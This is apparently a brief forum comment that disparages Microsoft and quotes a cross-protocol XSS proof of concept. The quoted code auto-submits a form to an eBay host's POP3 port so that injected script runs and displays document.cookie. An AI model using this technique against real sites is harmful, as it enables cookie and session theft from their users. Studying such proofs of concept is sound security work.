Do you work for Xatrix? Oh well... Another good example of Microsoft.... If your using Windows switch to Linux... If you dont want to.... At least use Opera..... 
BTW I like the code they used... Its amazing no one figured this out sooner...
Code:
<script>
window.open("http://www.ebay.com","w");
setTimeout("form1.submit()",300);
</script>
<form name="form1" method="post" action="http://thompson.ebay.com:110/" enctype="multipart/form-data">
<textarea name="eostest">
user <script>alert(document.cookie)</script>
quit
</textarea>
<input type="submit" value="Submit">
</form>